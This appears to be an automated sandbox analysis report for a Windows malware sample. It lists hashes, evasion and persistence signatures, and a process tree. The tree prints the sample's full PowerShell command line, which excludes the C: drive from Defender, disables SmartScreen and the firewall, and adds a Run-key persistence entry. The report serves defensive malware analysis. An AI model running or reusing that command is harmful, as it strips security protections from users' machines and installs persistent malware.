Analysis
-
max time kernel
165s -
max time network
165s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
15-02-2022 07:34
Static task
static1
Behavioral task
behavioral1
Sample
a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
Resource
win10v2004-en-20220112
General
-
Target
a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
-
Size
3.3MB
-
MD5
54da56b5f62fedb130a09c3bdc7c8e08
-
SHA1
1c5f44b45d798534f3d047d8f2596439ba02140c
-
SHA256
a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99
-
SHA512
c76c39305b9f216a114b255c3388c40e0981cd2a6a41ff7aab10d3ce346349910a200ad3e16cf570909752d64f726e3b04d2ba07209a207e6311cc3d78d2fefc
Malware Config
Signatures
-
Modifies security service 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" powershell.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
UpSys.exeUpSys.exeUpSys.exepid process 2968 UpSys.exe 1992 UpSys.exe 1204 UpSys.exe -
Modifies Windows Firewall 1 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe -
Drops startup file 1 IoCs
Processes:
a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe -
Processes:
resource yara_rule behavioral2/memory/640-130-0x00007FF7D2850000-0x00007FF7D3158000-memory.dmp themida behavioral2/memory/640-131-0x00007FF7D2850000-0x00007FF7D3158000-memory.dmp themida C:\ProgramData\MicrosoftNetwork\System.exe themida -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinNet = "C:\\ProgramData\\MicrosoftNetwork\\System.exe" powershell.exe -
Processes:
a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exepid process 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe -
Drops file in Windows directory 3 IoCs
Processes:
TiWorker.exesvchost.exedescription ioc process File opened for modification C:\Windows\WinSxS\pending.xml TiWorker.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat svchost.exe File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
MusNotifyIcon.exedescription ioc process Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MusNotifyIcon.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz MusNotifyIcon.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
svchost.exepowershell.exeUpSys.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\GeoVersion_EndpointFullUri = "https://geover.prod.do.dsp.mp.microsoft.com/geoversion" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CacheSizeBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PeerInfoCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadPendingCount = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCdnBytes = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrCnt = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LinkLocalConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkBps = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadCount = "0" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "3.703550" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkUsageBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\BkDownloadRatePct = "45" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadRatePct = "100" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ UpSys.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" UpSys.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCacheHostBytes = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\KVFileExpirationTime = "132895605555521796" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthlyUploadRestriction = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DODownloadMode = "1" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyInternetBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CDNConnectionCount = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\FrDownloadRatePct = "90" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLinkLocalBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LANConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkBps = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkUsageBps = "0" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyInternetBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadPendingCount = "0" svchost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exea1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exeUpSys.exepid process 1396 powershell.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 1396 powershell.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe 2968 UpSys.exe 2968 UpSys.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeUpSys.exeUpSys.exepowershell.exeTiWorker.exedescription pid process Token: SeDebugPrivilege 1396 powershell.exe Token: SeDebugPrivilege 2968 UpSys.exe Token: SeAssignPrimaryTokenPrivilege 2968 UpSys.exe Token: SeIncreaseQuotaPrivilege 2968 UpSys.exe Token: 0 2968 UpSys.exe Token: SeBackupPrivilege 1396 powershell.exe Token: SeDebugPrivilege 1992 UpSys.exe Token: SeAssignPrimaryTokenPrivilege 1992 UpSys.exe Token: SeIncreaseQuotaPrivilege 1992 UpSys.exe Token: SeBackupPrivilege 1396 powershell.exe Token: SeRestorePrivilege 1396 powershell.exe Token: SeSecurityPrivilege 1396 powershell.exe Token: SeDebugPrivilege 4076 powershell.exe Token: SeSecurityPrivilege 1272 TiWorker.exe Token: SeRestorePrivilege 1272 TiWorker.exe Token: SeBackupPrivilege 1272 TiWorker.exe Token: SeBackupPrivilege 1272 TiWorker.exe Token: SeRestorePrivilege 1272 TiWorker.exe Token: SeSecurityPrivilege 1272 TiWorker.exe Token: SeBackupPrivilege 1272 TiWorker.exe Token: SeRestorePrivilege 1272 TiWorker.exe Token: SeSecurityPrivilege 1272 TiWorker.exe Token: SeBackupPrivilege 1272 TiWorker.exe Token: SeRestorePrivilege 1272 TiWorker.exe Token: SeSecurityPrivilege 1272 TiWorker.exe Token: SeBackupPrivilege 1272 TiWorker.exe Token: SeRestorePrivilege 1272 TiWorker.exe Token: SeSecurityPrivilege 1272 TiWorker.exe Token: SeBackupPrivilege 1272 TiWorker.exe Token: SeRestorePrivilege 1272 TiWorker.exe Token: SeSecurityPrivilege 1272 TiWorker.exe Token: SeBackupPrivilege 1272 TiWorker.exe Token: SeRestorePrivilege 1272 TiWorker.exe Token: SeSecurityPrivilege 1272 TiWorker.exe Token: SeBackupPrivilege 1272 TiWorker.exe Token: SeRestorePrivilege 1272 TiWorker.exe Token: SeSecurityPrivilege 1272 TiWorker.exe Token: SeBackupPrivilege 1272 TiWorker.exe Token: SeRestorePrivilege 1272 TiWorker.exe Token: SeSecurityPrivilege 1272 TiWorker.exe Token: SeBackupPrivilege 1272 TiWorker.exe Token: SeRestorePrivilege 1272 TiWorker.exe Token: SeSecurityPrivilege 1272 TiWorker.exe Token: SeBackupPrivilege 1272 TiWorker.exe Token: SeRestorePrivilege 1272 TiWorker.exe Token: SeSecurityPrivilege 1272 TiWorker.exe Token: SeBackupPrivilege 1272 TiWorker.exe Token: SeRestorePrivilege 1272 TiWorker.exe Token: SeSecurityPrivilege 1272 TiWorker.exe Token: SeBackupPrivilege 1272 TiWorker.exe Token: SeRestorePrivilege 1272 TiWorker.exe Token: SeSecurityPrivilege 1272 TiWorker.exe Token: SeBackupPrivilege 1272 TiWorker.exe Token: SeRestorePrivilege 1272 TiWorker.exe Token: SeSecurityPrivilege 1272 TiWorker.exe Token: SeBackupPrivilege 1272 TiWorker.exe Token: SeRestorePrivilege 1272 TiWorker.exe Token: SeSecurityPrivilege 1272 TiWorker.exe Token: SeBackupPrivilege 1272 TiWorker.exe Token: SeRestorePrivilege 1272 TiWorker.exe Token: SeSecurityPrivilege 1272 TiWorker.exe Token: SeBackupPrivilege 1272 TiWorker.exe Token: SeRestorePrivilege 1272 TiWorker.exe Token: SeSecurityPrivilege 1272 TiWorker.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exepowershell.exeUpSys.exedescription pid process target process PID 640 wrote to memory of 1396 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe powershell.exe PID 640 wrote to memory of 1396 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe powershell.exe PID 1396 wrote to memory of 2968 1396 powershell.exe UpSys.exe PID 1396 wrote to memory of 2968 1396 powershell.exe UpSys.exe PID 1396 wrote to memory of 2664 1396 powershell.exe netsh.exe PID 1396 wrote to memory of 2664 1396 powershell.exe netsh.exe PID 1204 wrote to memory of 4076 1204 UpSys.exe powershell.exe PID 1204 wrote to memory of 4076 1204 UpSys.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe"C:\Users\Admin\AppData\Local\Temp\a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe"1⤵
- Checks BIOS information in registry
- Checks computer location settings
- Drops startup file
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)2⤵
- Modifies security service
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\UpSys.exe"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\UpSys.exe"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\UpSys.exe"C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off3⤵
-
C:\Windows\system32\MusNotifyIcon.exe%systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 131⤵
- Checks processor information in registry
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\MicrosoftNetwork\System.exeMD5
54da56b5f62fedb130a09c3bdc7c8e08
SHA11c5f44b45d798534f3d047d8f2596439ba02140c
SHA256a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99
SHA512c76c39305b9f216a114b255c3388c40e0981cd2a6a41ff7aab10d3ce346349910a200ad3e16cf570909752d64f726e3b04d2ba07209a207e6311cc3d78d2fefc
-
C:\ProgramData\UpSys.exeMD5
efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
C:\ProgramData\UpSys.exeMD5
efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
C:\ProgramData\UpSys.exeMD5
efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
C:\ProgramData\UpSys.exeMD5
efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
memory/640-131-0x00007FF7D2850000-0x00007FF7D3158000-memory.dmpFilesize
9.0MB
-
memory/640-132-0x00007FFBA0630000-0x00007FFBA0632000-memory.dmpFilesize
8KB
-
memory/640-130-0x00007FF7D2850000-0x00007FF7D3158000-memory.dmpFilesize
9.0MB
-
memory/1396-139-0x0000015CB2383000-0x0000015CB2385000-memory.dmpFilesize
8KB
-
memory/1396-144-0x0000015CB2388000-0x0000015CB2389000-memory.dmpFilesize
4KB
-
memory/1396-143-0x0000015CB2386000-0x0000015CB2388000-memory.dmpFilesize
8KB
